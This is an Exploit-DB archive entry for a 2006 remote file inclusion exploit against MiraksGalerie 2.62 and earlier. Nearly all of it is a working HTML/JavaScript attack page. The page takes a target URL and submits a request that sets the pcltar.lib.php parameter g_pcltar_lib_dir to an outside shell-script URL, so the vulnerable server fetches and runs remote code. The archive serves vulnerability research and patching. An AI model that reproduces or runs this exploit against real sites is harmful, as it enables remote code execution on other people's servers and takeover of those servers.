MiraksGalerie <= 2.62 pcltar.lib.php Remote File Include Exploit

2006-10-28T00:00:00
ID EDB-ID:2668
Type exploitdb
Reporter ajann
Modified 2006-10-28T00:00:00

Description

MiraksGalerie <= 2.62 (pcltar.lib.php) Remote File Include Exploit. Webapps exploit for php platform

                                        
                                            &lt;html&gt;
&lt;head&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1254"&gt;
&lt;title&gt;MiraksGalerie &lt;= 2.62 Remote File Include Exploit&lt;/title&gt;

&lt;script language="JavaScript"&gt;
 
//'===============================================================================================
//'[Script Name: MiraksGalerie &lt;= 2.62 Remote File Include Exploit
//'[Coded by   : ajann
//'[Author   : ajann
//'[Contact    : :(
//'[Using : Write Target after Submit Click
//'===============================================================================================
   

     //Basic exploit,but any time : ( 
   var adres="/pcltar.lib.php?" //FÝle name
   var acik ="g_pcltar_lib_dir=" // Line 68 - 72
   var shell="http://kro.275mb.com/57.txt?" // Shell Script
  
   function command(){
       if (document.rfi.target1.value==""){
          alert("Failed..");
      return false;
    }


  
  rfi.action= document.rfi.target1.value+adres+acik+shell; // Ready Target : )
  rfi.submit(); // Form Submit
   }
&lt;/script&gt;

&lt;/head&gt;

&lt;body bgcolor="#000000"&gt;
&lt;center&gt;

&lt;p&gt;&lt;b&gt;&lt;font face="Verdana" size="2" color="#008000"&gt;MiraksGalerie &lt;= 2.62 Remote File 
Include Exploit&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;/p&gt;
&lt;form method="post" target="getting" name="rfi" onSubmit="command();"&gt;
    &lt;b&gt;&lt;font face="Arial" size="1" color="#FF0000"&gt;Target:&lt;/font&gt;&lt;font face="Arial" size="1" color="#808080"&gt;[http://[target]/[scriptpath]&lt;/font&gt;&lt;font color="#00FF00" size="2" face="Arial"&gt;
  &lt;/font&gt;&lt;font color="#FF0000" size="2"&gt;&nbsp;&lt;/font&gt;&lt;/b&gt;
  &lt;input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"&gt;&lt;/p&gt;
  &lt;p&gt;&lt;input type="submit" value="Gönder" name="B1"&gt;&lt;input type="reset" value="Sýfýrla" name="B2"&gt;&lt;/p&gt;
&lt;/form&gt;
&lt;p&gt;&lt;br&gt;
&lt;iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"&gt;&lt;/iframe&gt;
&lt;/p&gt;
&lt;b&gt;&lt;font face="Verdana" size="2" color="#008000"&gt;ajann&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
&lt;/center&gt;
&lt;/body&gt;

&lt;/html&gt;

# milw0rm.com [2006-10-28]